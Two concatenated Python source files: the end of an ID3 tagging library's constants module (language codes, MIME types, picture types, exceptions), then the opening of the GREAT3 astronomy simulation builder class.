'qjf': 'Reserved for local use',
'qjg': 'Reserved for local use',
'qjh': 'Reserved for local use',
'qji': 'Reserved for local use',
'qjj': 'Reserved for local use',
'qjk': 'Reserved for local use',
'qjl': 'Reserved for local use',
'qjm': 'Reserved for local use',
'qjn': 'Reserved for local use',
'qjo': 'Reserved for local use',
'qjp': 'Reserved for local use',
'qjq': 'Reserved for local use',
'qjr': 'Reserved for local use',
'qjs': 'Reserved for local use',
'qjt': 'Reserved for local use',
'qju': 'Reserved for local use',
'qjv': 'Reserved for local use',
'qjw': 'Reserved for local use',
'qjx': 'Reserved for local use',
'qjy': 'Reserved for local use',
'qjz': 'Reserved for local use',
'qka': 'Reserved for local use',
'qkb': 'Reserved for local use',
'qkc': 'Reserved for local use',
'qkd': 'Reserved for local use',
'qke': 'Reserved for local use',
'qkf': 'Reserved for local use',
'qkg': 'Reserved for local use',
'qkh': 'Reserved for local use',
'qki': 'Reserved for local use',
'qkj': 'Reserved for local use',
'qkk': 'Reserved for local use',
'qkl': 'Reserved for local use',
'qkm': 'Reserved for local use',
'qkn': 'Reserved for local use',
'qko': 'Reserved for local use',
'qkp': 'Reserved for local use',
'qkq': 'Reserved for local use',
'qkr': 'Reserved for local use',
'qks': 'Reserved for local use',
'qkt': 'Reserved for local use',
'qku': 'Reserved for local use',
'qkv': 'Reserved for local use',
'qkw': 'Reserved for local use',
'qkx': 'Reserved for local use',
'qky': 'Reserved for local use',
'qkz': 'Reserved for local use',
'qla': 'Reserved for local use',
'qlb': 'Reserved for local use',
'qlc': 'Reserved for local use',
'qld': 'Reserved for local use',
'qle': 'Reserved for local use',
'qlf': 'Reserved for local use',
'qlg': 'Reserved for local use',
'qlh': 'Reserved for local use',
'qli': 'Reserved for local use',
'qlj': 'Reserved for local use',
'qlk': 'Reserved for local use',
'qll': 'Reserved for local use',
'qlm': 'Reserved for local use',
'qln': 'Reserved for local use',
'qlo': 'Reserved for local use',
'qlp': 'Reserved for local use',
'qlq': 'Reserved for local use',
'qlr': 'Reserved for local use',
'qls': 'Reserved for local use',
'qlt': 'Reserved for local use',
'qlu': 'Reserved for local use',
'qlv': 'Reserved for local use',
'qlw': 'Reserved for local use',
'qlx': 'Reserved for local use',
'qly': 'Reserved for local use',
'qlz': 'Reserved for local use',
'qma': 'Reserved for local use',
'qmb': 'Reserved for local use',
'qmc': 'Reserved for local use',
'qmd': 'Reserved for local use',
'qme': 'Reserved for local use',
'qmf': 'Reserved for local use',
'qmg': 'Reserved for local use',
'qmh': 'Reserved for local use',
'qmi': 'Reserved for local use',
'qmj': 'Reserved for local use',
'qmk': 'Reserved for local use',
'qml': 'Reserved for local use',
'qmm': 'Reserved for local use',
'qmn': 'Reserved for local use',
'qmo': 'Reserved for local use',
'qmp': 'Reserved for local use',
'qmq': 'Reserved for local use',
'qmr': 'Reserved for local use',
'qms': 'Reserved for local use',
'qmt': 'Reserved for local use',
'qmu': 'Reserved for local use',
'qmv': 'Reserved for local use',
'qmw': 'Reserved for local use',
'qmx': 'Reserved for local use',
'qmy': 'Reserved for local use',
'qmz': 'Reserved for local use',
'qna': 'Reserved for local use',
'qnb': 'Reserved for local use',
'qnc': 'Reserved for local use',
'qnd': 'Reserved for local use',
'qne': 'Reserved for local use',
'qnf': 'Reserved for local use',
'qng': 'Reserved for local use',
'qnh': 'Reserved for local use',
'qni': 'Reserved for local use',
'qnj': 'Reserved for local use',
'qnk': 'Reserved for local use',
'qnl': 'Reserved for local use',
'qnm': 'Reserved for local use',
'qnn': 'Reserved for local use',
'qno': 'Reserved for local use',
'qnp': 'Reserved for local use',
'qnq': 'Reserved for local use',
'qnr': 'Reserved for local use',
'qns': 'Reserved for local use',
'qnt': 'Reserved for local use',
'qnu': 'Reserved for local use',
'qnv': 'Reserved for local use',
'qnw': 'Reserved for local use',
'qnx': 'Reserved for local use',
'qny': 'Reserved for local use',
'qnz': 'Reserved for local use',
'qoa': 'Reserved for local use',
'qob': 'Reserved for local use',
'qoc': 'Reserved for local use',
'qod': 'Reserved for local use',
'qoe': 'Reserved for local use',
'qof': 'Reserved for local use',
'qog': 'Reserved for local use',
'qoh': 'Reserved for local use',
'qoi': 'Reserved for local use',
'qoj': 'Reserved for local use',
'qok': 'Reserved for local use',
'qol': 'Reserved for local use',
'qom': 'Reserved for local use',
'qon': 'Reserved for local use',
'qoo': 'Reserved for local use',
'qop': 'Reserved for local use',
'qoq': 'Reserved for local use',
'qor': 'Reserved for local use',
'qos': 'Reserved for local use',
'qot': 'Reserved for local use',
'qou': 'Reserved for local use',
'qov': 'Reserved for local use',
'qow': 'Reserved for local use',
'qox': 'Reserved for local use',
'qoy': 'Reserved for local use',
'qoz': 'Reserved for local use',
'qpa': 'Reserved for local use',
'qpb': 'Reserved for local use',
'qpc': 'Reserved for local use',
'qpd': 'Reserved for local use',
'qpe': 'Reserved for local use',
'qpf': 'Reserved for local use',
'qpg': 'Reserved for local use',
'qph': 'Reserved for local use',
'qpi': 'Reserved for local use',
'qpj': 'Reserved for local use',
'qpk': 'Reserved for local use',
'qpl': 'Reserved for local use',
'qpm': 'Reserved for local use',
'qpn': 'Reserved for local use',
'qpo': 'Reserved for local use',
'qpp': 'Reserved for local use',
'qpq': 'Reserved for local use',
'qpr': 'Reserved for local use',
'qps': 'Reserved for local use',
'qpt': 'Reserved for local use',
'qpu': 'Reserved for local use',
'qpv': 'Reserved for local use',
'qpw': 'Reserved for local use',
'qpx': 'Reserved for local use',
'qpy': 'Reserved for local use',
'qpz': 'Reserved for local use',
'qqa': 'Reserved for local use',
'qqb': 'Reserved for local use',
'qqc': 'Reserved for local use',
'qqd': 'Reserved for local use',
'qqe': 'Reserved for local use',
'qqf': 'Reserved for local use',
'qqg': 'Reserved for local use',
'qqh': 'Reserved for local use',
'qqi': 'Reserved for local use',
'qqj': 'Reserved for local use',
'qqk': 'Reserved for local use',
'qql': 'Reserved for local use',
'qqm': 'Reserved for local use',
'qqn': 'Reserved for local use',
'qqo': 'Reserved for local use',
'qqp': 'Reserved for local use',
'qqq': 'Reserved for local use',
'qqr': 'Reserved for local use',
'qqs': 'Reserved for local use',
'qqt': 'Reserved for local use',
'qqu': 'Reserved for local use',
'qqv': 'Reserved for local use',
'qqw': 'Reserved for local use',
'qqx': 'Reserved for local use',
'qqy': 'Reserved for local use',
'qqz': 'Reserved for local use',
'qra': 'Reserved for local use',
'qrb': 'Reserved for local use',
'qrc': 'Reserved for local use',
'qrd': 'Reserved for local use',
'qre': 'Reserved for local use',
'qrf': 'Reserved for local use',
'qrg': 'Reserved for local use',
'qrh': 'Reserved for local use',
'qri': 'Reserved for local use',
'qrj': 'Reserved for local use',
'qrk': 'Reserved for local use',
'qrl': 'Reserved for local use',
'qrm': 'Reserved for local use',
'qrn': 'Reserved for local use',
'qro': 'Reserved for local use',
'qrp': 'Reserved for local use',
'qrq': 'Reserved for local use',
'qrr': 'Reserved for local use',
'qrs': 'Reserved for local use',
'qrt': 'Reserved for local use',
'qru': 'Reserved for local use',
'qrv': 'Reserved for local use',
'qrw': 'Reserved for local use',
'qrx': 'Reserved for local use',
'qry': 'Reserved for local use',
'qrz': 'Reserved for local use',
'qsa': 'Reserved for local use',
'qsb': 'Reserved for local use',
'qsc': 'Reserved for local use',
'qsd': 'Reserved for local use',
'qse': 'Reserved for local use',
'qsf': 'Reserved for local use',
'qsg': 'Reserved for local use',
'qsh': 'Reserved for local use',
'qsi': 'Reserved for local use',
'qsj': 'Reserved for local use',
'qsk': 'Reserved for local use',
'qsl': 'Reserved for local use',
'qsm': 'Reserved for local use',
'qsn': 'Reserved for local use',
'qso': 'Reserved for local use',
'qsp': 'Reserved for local use',
'qsq': 'Reserved for local use',
'qsr': 'Reserved for local use',
'qss': 'Reserved for local use',
'qst': 'Reserved for local use',
'qsu': 'Reserved for local use',
'qsv': 'Reserved for local use',
'qsw': 'Reserved for local use',
'qsx': 'Reserved for local use',
'qsy': 'Reserved for local use',
'qsz': 'Reserved for local use',
'qta': 'Reserved for local use',
'qtb': 'Reserved for local use',
'qtc': 'Reserved for local use',
'qtd': 'Reserved for local use',
'qte': 'Reserved for local use',
'qtf': 'Reserved for local use',
'qtg': 'Reserved for local use',
'qth': 'Reserved for local use',
'qti': 'Reserved for local use',
'qtj': 'Reserved for local use',
'qtk': 'Reserved for local use',
'qtl': 'Reserved for local use',
'qtm': 'Reserved for local use',
'qtn': 'Reserved for local use',
'qto': 'Reserved for local use',
'qtp': 'Reserved for local use',
'qtq': 'Reserved for local use',
'qtr': 'Reserved for local use',
'qts': 'Reserved for local use',
'qtt': 'Reserved for local use',
'qtu': 'Reserved for local use',
'qtv': 'Reserved for local use',
'qtw': 'Reserved for local use',
'qtx': 'Reserved for local use',
'qty': 'Reserved for local use',
'qtz': 'Reserved for local use',
'que': 'Quechua',
'raj': 'Rajasthani',
'rap': 'Rapanui',
'rar': 'Rarotongan; Cook Islands Maori',
'roa': 'Romance languages',
'roh': 'Romansh',
'rom': 'Romany',
'rum': 'Romanian; Moldavian; Moldovan',
'ron': 'Romanian; Moldavian; Moldovan',
'run': 'Rundi',
'rup': 'Aromanian; Arumanian; Macedo-Romanian',
'rus': 'Russian',
'sad': 'Sandawe',
'sag': 'Sango',
'sah': 'Yakut',
'sai': 'South American Indian languages',
'sal': 'Salishan languages',
'sam': 'Samaritan Aramaic',
'san': 'Sanskrit',
'sas': 'Sasak',
'sat': 'Santali',
'scn': 'Sicilian',
'sco': 'Scots',
'sel': 'Selkup',
'sem': 'Semitic languages',
'sga': 'Irish, Old (to 900)',
'sgn': 'Sign Languages',
'shn': 'Shan',
'sid': 'Sidamo',
'sin': 'Sinhala; Sinhalese',
'sio': 'Siouan languages',
'sit': 'Sino-Tibetan languages',
'sla': 'Slavic languages',
'slo': 'Slovak',
'slk': 'Slovak',
'slv': 'Slovenian',
'sma': 'Southern Sami',
'sme': 'Northern Sami',
'smi': 'Sami languages',
'smj': 'Lule Sami',
'smn': 'Inari Sami',
'smo': 'Samoan',
'sms': 'Skolt Sami',
'sna': 'Shona',
'snd': 'Sindhi',
'snk': 'Soninke',
'sog': 'Sogdian',
'som': 'Somali',
'son': 'Songhai languages',
'sot': 'Sotho, Southern',
'spa': 'Spanish; Castilian',
'sqi': 'Albanian',
'srd': 'Sardinian',
'srn': 'Sranan Tongo',
'srp': 'Serbian',
'srr': 'Serer',
'ssa': 'Nilo-Saharan languages',
'ssw': 'Swati',
'suk': 'Sukuma',
'sun': 'Sundanese',
'sus': 'Susu',
'sux': 'Sumerian',
'swa': 'Swahili',
'swe': 'Swedish',
'syc': 'Classical Syriac',
'syr': 'Syriac',
'tah': 'Tahitian',
'tai': 'Tai languages',
'tam': 'Tamil',
'tat': 'Tatar',
'tel': 'Telugu',
'tem': 'Timne',
'ter': 'Tereno',
'tet': 'Tetum',
'tgk': 'Tajik',
'tgl': 'Tagalog',
'tha': 'Thai',
'tib': 'Tibetan',
'tig': 'Tigre',
'tir': 'Tigrinya',
'tiv': 'Tiv',
'tkl': 'Tokelau',
'tlh': 'Klingon; tlhIngan-Hol',
'tli': 'Tlingit',
'tmh': 'Tamashek',
'tog': 'Tonga (Nyasa)',
'ton': 'Tonga (Tonga Islands)',
'tpi': 'Tok Pisin',
'tsi': 'Tsimshian',
'tsn': 'Tswana',
'tso': 'Tsonga',
'tuk': 'Turkmen',
'tum': 'Tumbuka',
'tup': 'Tupi languages',
'tur': 'Turkish',
'tut': 'Altaic languages',
'tvl': 'Tuvalu',
'twi': 'Twi',
'tyv': 'Tuvinian',
'udm': 'Udmurt',
'uga': 'Ugaritic',
'uig': 'Uighur; Uyghur',
'ukr': 'Ukrainian',
'umb': 'Umbundu',
'und': 'Undetermined',
'urd': 'Urdu',
'uzb': 'Uzbek',
'vai': 'Vai',
'ven': 'Venda',
'vie': 'Vietnamese',
'vol': 'Volapük',
'vot': 'Votic',
'wak': 'Wakashan languages',
'wal': 'Wolaitta; Wolaytta',
'war': 'Waray',
'was': 'Washo',
'wel': 'Welsh',
'wen': 'Sorbian languages',
'wln': 'Walloon',
'wol': 'Wolof',
'xal': 'Kalmyk; Oirat',
'xho': 'Xhosa',
'yao': 'Yao',
'yap': 'Yapese',
'yid': 'Yiddish',
'yor': 'Yoruba',
'ypk': 'Yupik languages',
'zap': 'Zapotec',
'zbl': 'Blissymbols; Blissymbolics; Bliss',
'zen': 'Zenaga',
'zgh': 'Standard Moroccan Tamazight',
'zha': 'Zhuang; Chuang',
'zho': 'Chinese',
'znd': 'Zande languages',
'zul': 'Zulu',
'zun': 'Zuni',
'zxx': 'No linguistic content; Not applicable',
'zza': 'Zaza; Dimili; Dimli; Kirdki; Kirmanjki; Zazaki',
}
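# Editor's sketch (illustrative helper): resolve the 3-byte language field of
# COMM/USLT frames against the table above, treating unknown codes as 'und'.
def _language_name(code):
    return LANGUAGE_CODES_ISO_639_2_DICT.get(
        code, LANGUAGE_CODES_ISO_639_2_DICT['und'])
# e.g. _language_name('eng') == 'English'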
class MIME_TYPES(object):
APPLICATION_ACAD = 'application/acad'
APPLICATION_APPLEFILE = 'application/applefile'
APPLICATION_ASTOUND = 'application/astound'
APPLICATION_DSPTYPE = 'application/dsptype'
APPLICATION_DXF = 'application/dxf'
APPLICATION_FUTURESPLASH = 'application/futuresplash'
APPLICATION_GZIP = 'application/gzip'
APPLICATION_JAVASCRIPT = 'application/javascript'
APPLICATION_JSON = 'application/json'
APPLICATION_LISTENUP = 'application/listenup'
APPLICATION_MAC_BINHEX_40 = 'application/mac-binhex40'
APPLICATION_MBEDLET = 'application/mbedlet'
APPLICATION_MIF = 'application/mif'
APPLICATION_MSEXCEL = 'application/msexcel'
APPLICATION_MSHELP = 'application/mshelp'
    APPLICATION_MSPOWERPOINT = 'application/mspowerpoint'
APPLICATION_MSWORD = 'application/msword'
APPLICATION_OCTET_STREAM = 'application/octet-stream'
APPLICATION_ODA = 'application/oda'
APPLICATION_PDF = 'application/pdf'
APPLICATION_POSTSCRIPT = 'application/postscript'
APPLICATION_RTC = 'application/rtc'
APPLICATION_RTF = 'application/rtf'
APPLICATION_STUDIOM = 'application/studiom'
APPLICATION_TOOLBOOK = 'application/toolbook'
APPLICATION_VOCALTEC_MEDIA_DESC = 'application/vocaltec-media-desc'
APPLICATION_VOCALTEC_MEDIA_FILE = 'application/vocaltec-media-file'
APPLICATION_VND_OPENXMLFORMATS_OFFICEDOCUMENT_SPREADSHEETML_SHEET = \
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
APPLICATION_VND_OPENXMLFORMATS_OFFICEDOCUMENT_WORDPROCESSINGML_DOCUMENT = \
'application/vnd.openxmlformats-officedocument.wordprocessingml.document'
APPLICATION_XHTML_XML = 'application/xhtml+xml'
APPLICATION_XML = 'application/xml'
APPLICATION_X_BCPIO = 'application/x-bcpio'
APPLICATION_X_COMPRESS = 'application/x-compress'
APPLICATION_X_CPIO = 'application/x-cpio'
APPLICATION_X_CSH = 'application/x-csh'
APPLICATION_X_DIRECTOR = 'application/x-director'
APPLICATION_X_DVI = 'application/x-dvi'
APPLICATION_X_ENVOY = 'application/x-envoy'
APPLICATION_X_GTAR = 'application/x-gtar'
APPLICATION_X_HDF = 'application/x-hdf'
APPLICATION_X_HTTPD_PHP = 'application/x-httpd-php'
APPLICATION_X_LATEX = 'application/x-latex'
APPLICATION_X_MACBINARY = 'application/x-macbinary'
APPLICATION_X_MIF = 'application/x-mif'
APPLICATION_X_NETCDF = 'application/x-netcdf'
APPLICATION_X_NSCHAT = 'application/x-nschat'
APPLICATION_X_SH = 'application/x-sh'
APPLICATION_X_SHAR = 'application/x-shar'
APPLICATION_X_SHOCKWAVE_FLASH = 'application/x-shockwave-flash'
APPLICATION_X_SPRITE = 'application/x-sprite'
APPLICATION_X_STUFFIT = 'application/x-stuffit'
APPLICATION_X_SUPERCARD = 'application/x-supercard'
APPLICATION_X_SV4CPIO = 'application/x-sv4cpio'
APPLICATION_X_SV4CRC = 'application/x-sv4crc'
APPLICATION_X_TAR = 'application/x-tar'
APPLICATION_X_TCL = 'application/x-tcl'
APPLICATION_X_TEX = 'application/x-tex'
APPLICATION_X_TEXINFO = 'application/x-texinfo'
APPLICATION_X_TROFF = 'application/x-troff'
APPLICATION_X_TROFF_MAN = 'application/x-troff-man'
APPLICATION_X_TROFF_ME = 'application/x-troff-me'
APPLICATION_X_TROFF_MS = 'application/x-troff-ms'
APPLICATION_X_USTAR = 'application/x-ustar'
APPLICATION_X_WAIS_SOURCE = 'application/x-wais-source'
APPLICATION_X_WWW_FORM_URLENCODED = 'application/x-www-form-urlencoded'
APPLICATION_ZIP = 'application/zip'
AUDIO_BASIC = 'audio/basic'
AUDIO_ECHOSPEECH = 'audio/echospeech'
AUDIO_TSPLAYER = 'audio/tsplayer'
AUDIO_VOXWARE = 'audio/voxware'
AUDIO_X_AIFF = 'audio/x-aiff'
AUDIO_X_DSPEEH = 'audio/x-dspeeh'
AUDIO_X_MIDI = 'audio/x-midi'
AUDIO_X_MPEG = 'audio/x-mpeg'
AUDIO_X_PN_REALAUDIO = 'audio/x-pn-realaudio'
AUDIO_X_PN_REALAUDIO_PLUGIN = 'audio/x-pn-realaudio-plugin'
AUDIO_X_QT_STREAM = 'audio/x-qt-stream'
AUDIO_X_WAV = 'audio/x-wav'
DRAWING_X_DWF = 'drawing/x-dwf'
IMAGE_BMP = 'image/bmp'
IMAGE_CIS_COD = 'image/cis-cod'
IMAGE_CMU_RASTER = 'image/cmu-raster'
IMAGE_FIF = 'image/fif'
IMAGE_GIF = 'image/gif'
IMAGE_IEF = 'image/ief'
IMAGE_JPEG = 'image/jpeg'
IMAGE_PNG = 'image/png'
IMAGE_SVG_XML = 'image/svg+xml'
IMAGE_TIFF = 'image/tiff'
IMAGE_VASA = 'image/vasa'
IMAGE_VND_WAP_WBMP = 'image/vnd.wap.wbmp'
IMAGE_X_FREEHAND = 'image/x-freehand'
IMAGE_X_ICON = 'image/x-icon'
IMAGE_X_PORTABLE_ANYMAP = 'image/x-portable-anymap'
IMAGE_X_PORTABLE_BITMAP = 'image/x-portable-bitmap'
IMAGE_X_PORTABLE_GRAYMAP = 'image/x-portable-graymap'
IMAGE_X_PORTABLE_PIXMAP = 'image/x-portable-pixmap'
IMAGE_X_RGB = 'image/x-rgb'
IMAGE_X_WINDOWDUMP = 'image/x-windowdump'
IMAGE_X_XBITMAP = 'image/x-xbitmap'
IMAGE_X_XPIXMAP = 'image/x-xpixmap'
    MESSAGE_EXTERNAL_BODY = 'message/external-body'
MESSAGE_HTTP = 'message/http'
MESSAGE_NEWS = 'message/news'
MESSAGE_PARTIAL = 'message/partial'
MESSAGE_RFC822 = 'message/rfc822'
MODEL_VRML = 'model/vrml'
MULTIPART_ALTERNATIVE = 'multipart/alternative'
MULTIPART_BYTERANGES = 'multipart/byteranges'
MULTIPART_DIGEST = 'multipart/digest'
MULTIPART_ENCRYPTED = 'multipart/encrypted'
MULTIPART_FORM_DATA = 'multipart/form-data'
MULTIPART_MIXED = 'multipart/mixed'
MULTIPART_PARALLEL = 'multipart/parallel'
MULTIPART_RELATED = 'multipart/related'
MULTIPART_REPORT = 'multipart/report'
MULTIPART_SIGNED = 'multipart/signed'
MULTIPART_VOICE_MESSAGE = 'multipart/voice-message'
TEXT_COMMA_SEPARATED_VALUES = 'text/comma-separated-values'
TEXT_CSS = 'text/css'
TEXT_HTML = 'text/html'
TEXT_JAVASCRIPT = 'text/javascript'
TEXT_PLAIN = 'text/plain'
TEXT_RICHTEXT = 'text/richtext'
TEXT_RTF = 'text/rtf'
TEXT_TAB_SEPARATED_VALUES = 'text/tab-separated-values'
TEXT_VND_WAP_WML = 'text/vnd.wap.wml'
APPLICATION_VND_WAP_WMLC = 'application/vnd.wap.wmlc'
TEXT_VND_WAP_WMLSCRIPT = 'text/vnd.wap.wmlscript'
APPLICATION_VND_WAP_WMLSCRIPTC = 'application/vnd.wap.wmlscriptc'
TEXT_XML = 'text/xml'
TEXT_XML_EXTERNAL_PARSED_ENTITY = 'text/xml-external-parsed-entity'
TEXT_X_SETEXT = 'text/x-setext'
TEXT_X_SGML = 'text/x-sgml'
TEXT_X_SPEECH = 'text/x-speech'
VIDEO_MPEG = 'video/mpeg'
VIDEO_MP4 = 'video/mp4'
VIDEO_QUICKTIME = 'video/quicktime'
VIDEO_VND_VIVO = 'video/vnd.vivo'
VIDEO_WEBM = 'video/webm'
VIDEO_X_MSVIDEO = 'video/x-msvideo'
VIDEO_X_SGI_MOVIE = 'video/x-sgi-movie'
WORKBOOK_FORMULAONE = 'workbook/formulaone'
X_WORLD_X_3DMF = 'x-world/x-3dmf'
X_WORLD_X_VRML = 'x-world/x-vrml'
MIME_TYPES_LIST = [MIME_TYPES.__dict__[i] for i in MIME_TYPES.__dict__.keys() if not i.startswith('__')]
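# Illustrative aside (not part of the original module): the comprehension above
# collects every constant defined on the class by filtering dunder entries out
# of its __dict__, so the list holds the MIME type strings themselves, e.g.:
#
#     assert 'text/html' in MIME_TYPES_LIST
#     assert MIME_TYPES.TEXT_HTML in MIME_TYPES_LIST   # same check, by attribute
#
# Note that __dict__ ordering is arbitrary, so MIME_TYPES_LIST should be
# treated as an unordered collection of known MIME type strings.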
class ID3v2_3_PICTURE_TYPES(object):
OTHER = '\x00'
FILE_ICON_32x32 = '\x01'
OTHER_FILE_ICON = '\x02'
COVER_FRONT = '\x03'
COVER_BACK = '\x04'
LEAFLET_PAGE = '\x05'
MEDIA = '\x06'
LEAD_ARTIST_LEAD_PERFORMER_SOLOIST = '\x07'
ARTIST_PERFORMER = '\x08'
CONDUCTOR = '\x09'
BAND_ORCHESTRA = '\x0A'
COMPOSER = '\x0B'
LYRICIST_TEXT_WRITER = '\x0C'
RECORDING_LOCATION = '\x0D'
DURING_RECORDING = '\x0E'
DURING_PERFORMANCE = '\x0F'
MOVIE_VIDEO_SCREEN_CAPTURE = '\x10'
A_BRIGHT_COLOURED_FISH = '\x11'
ILLUSTRATION = '\x12'
BAND_ARTIST_LOGOTYPE = '\x13'
PUBLISHER_STUDIO_LOGOTYPE = '\x14'
ID3v2_3_PICTURE_TYPES_LIST = [ID3v2_3_PICTURE_TYPES.__dict__[i] for i in ID3v2_3_PICTURE_TYPES.__dict__.keys()
if not i.startswith('__')]
# exceptions
class PyID3TaggerException(Exception):
pass
class PyID3TaggerNotImplementedError(PyID3TaggerException):
pass
class PyID3TaggerInvalidData(PyID3TaggerException):
pass
class PyID3TaggerIOError(PyID3TaggerException):
pass
class PyID3TaggerFilePathException(PyID3TaggerException):
pass
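# Illustrative sketch (not from the original source): since every exception
# above derives from PyID3TaggerException, callers can catch the base class for
# any tagger failure, or a subclass for finer-grained handling, e.g.:
#
#     try:
#         tagger.parse(path)                 # hypothetical API call
#     except PyID3TaggerIOError:
#         handle_io_problem(path)            # hypothetical recovery hook
#     except PyID3TaggerException:
#         raise                              # anything else is fatal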
| pkla6/pyid3tagger | pyid3tagger/const.py | Python | mit | 54,824 | ["NetCDF"] | cc40c3804bd61a520f7236fdc18c326f8efb41fef7ce52e83bb211e90242de1f |
# Copyright (c) 2014, the GREAT3 executive committee (http://www.great3challenge.info/?q=contacts)
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted
# provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions
# and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of
# conditions and the following disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to
# endorse or promote products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
# FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER
# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
# OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
This file contains the SimBuilder class that does the heavy lifting; it coordinates all the steps
that are needed to generate parameters, catalogs, config files, images, and image packages for a
given GREAT3 branch (experiment, data type, shear type).
"""
import os
import datetime
import getpass
import numpy
import galsim
import great3sims.mapper
import great3sims.psf
import great3sims.noise
import great3sims.shear
import great3sims.galaxies
from . import constants
class SimBuilder(object):
# Per-experiment parameters; should be overridden by per-experiment subclasses (see customize())
experiment = None
real_galaxy = False
variable_psf = False
draw_psf_src = None
shear_value = None
shear_angle = None
multiepoch = False
@staticmethod
def customize(experiment, real_galaxy=None, variable_psf=None, multiepoch=None):
"""Create a custom subclass of SimBuilder with class variables overridden from
their default (control experiment) values depending on what keyword arguments are set.
"""
cls = type(experiment, (SimBuilder,), dict())
cls.experiment = experiment
if real_galaxy is not None:
cls.real_galaxy = real_galaxy
if variable_psf is not None:
cls.variable_psf = variable_psf
if multiepoch is not None:
cls.multiepoch = multiepoch
return cls
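# Illustrative usage sketch (not from the original source): customize() is a
# small class factory built on type(); a "real galaxy" experiment would be
# created and instantiated roughly like this (the constructor arguments shown
# are placeholders):
#
#     RealGalaxyBuilder = SimBuilder.customize('real_galaxy', real_galaxy=True)
#     builder = RealGalaxyBuilder(root='sims', obs_type='ground',
#                                 shear_type='constant', ...)
#
# Subclassing via type() keeps the per-experiment differences down to a few
# class attributes instead of requiring a parallel class hierarchy.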
def __init__(self, root, obs_type, shear_type, gal_dir, ps_dir, opt_psf_dir, atmos_ps_dir,
public_dir, draw_psf_src, shear_value, shear_angle, truth_dir, preload=False, nproc=-1, gal_pairs=True):
"""Initialize a builder for the given `obs_type` and `shear_type`.
@param[in] root Root directory for generated files.
@param[in] obs_type Type of observation to simulate: either "ground" or "space".
@param[in] shear_type Type of shear field to generate: either "constant" or "variable".
@param[in] gal_dir Directory with real galaxy catalog information.
@param[in] ps_dir Directory with tabulated iCosmo shear power spectra.
@param[in] opt_psf_dir Directory with the optical PSF models for ground and space
variable PSF simulations.
@param[in] atmos_ps_dir Directory with tabulated atmospheric PSF anisotropy power spectra.
@param[in] public_dir Directory for placing files to be distributed publicly.
@param[in] truth_dir Directory for placing files to be used for metric evaluation.
@param[in] preload Preload the RealGalaxyCatalog images to speed up generation of large
numbers of real galaxies? Note that for parametric galaxy branches,
the catalog is never preloaded. [default = False]
@param[in] nproc How many processes to use in the config file. [default = -1]
@param[in] gal_pairs For constant shear branches, should it use 90 degree rotated pairs
to cancel out shape noise, or not? This option is ignored for
variable shear branches. [default: True]
@param[in] draw_psf_src Draw psf from a distribution?
@param[in] shear_value Value for constant shear experiments
@param[in] shear_angle Angle for constant shear experiments
"""
self.obs_type = obs_type
self.shear_type = shear_type
self.public_dir = public_dir
self.truth_dir = truth_dir
self.preload = preload
self.draw_psf_src = draw_psf_src
self.shear_value = shear_value
self.shear_angle = shear_angle
# Below we initialize the builders for the PSF, shear, galaxy population, and noise field.
# They each require various bits of information as appropriate (e.g., only the PSF builder
# needs to know where information about atmospheric PSFs lives).
self.psf_builder = great3sims.psf.makeBuilder(obs_type=obs_type,
variable_psf=self.variable_psf,
multiepoch=self.multiepoch,
shear_type=self.shear_type,
opt_psf_dir=opt_psf_dir,
atmos_ps_dir=atmos_ps_dir,
draw_psf_src=draw_psf_src)
self.shear_builder = great3sims.shear.makeBuilder(shear_type=shear_type, obs_type=obs_type,
multiepoch=self.multiepoch, ps_dir=ps_dir,
shear_value=shear_value, shear_angle=shear_angle)
self.galaxy_builder = great3sims.galaxies.makeBuilder(real_galaxy=self.real_galaxy,
obs_type=obs_type,
shear_type=shear_type,
multiepoch=self.multiepoch,
gal_dir=gal_dir,
preload=preload,
gal_pairs=gal_pairs)
self.noise_builder = great3sims.noise.makeBuilder(obs_type=obs_type,
multiepoch=self.multiepoch,
variable_psf=self.variable_psf)
# We also initialize a mapper, which assists with i/o for this branch. It knows how to make
# directory and file names depending on the branch, and what types of files need to be
# output for that branch.
self.mapper = great3sims.mapper.Mapper(root, self.experiment, obs_type, shear_type)
# And store some additional necessary information.
self.n_epochs = constants.n_epochs if self.multiepoch else 1
self.nproc = nproc
def writeParameters(self, seed):
"""Generate and write the metaparameters of the builder.
This creates four types of files:
- a single dict of parameters for the branch (=experiment+obs_type+shear_type combination)
- a dict of parameters for each field
- a dict of parameters for each subfield
- a dict of parameters for each subfield+epoch combination
The given seed (an integer) is the first of a sequence of consecutive integers used to seed
random number generators for the different steps; these seeds are saved in the metaparameter
dictionaries to make simulation generation deterministic (and suitable for parallelization)
after this step. The next unused seed number is returned, so it can be passed to a
subsequent call.
"""
# First get some basic quantities for this branch: metadata, pixel scale, and the grouping
# of subfields into fields with identical PSF and shear fields
metadata = {"timestamp": str(datetime.datetime.now()), "user": getpass.getuser()}
pixel_scale = constants.pixel_scale[self.obs_type][self.multiepoch]
n_subfields = constants.n_subfields
n_subfields_per_field = constants.n_subfields_per_field[self.shear_type][self.variable_psf]
if n_subfields % n_subfields_per_field != 0:
raise RuntimeError("%d subfields does not divide evenly into %d fields!" % \
(n_subfields, n_subfields_per_field) )
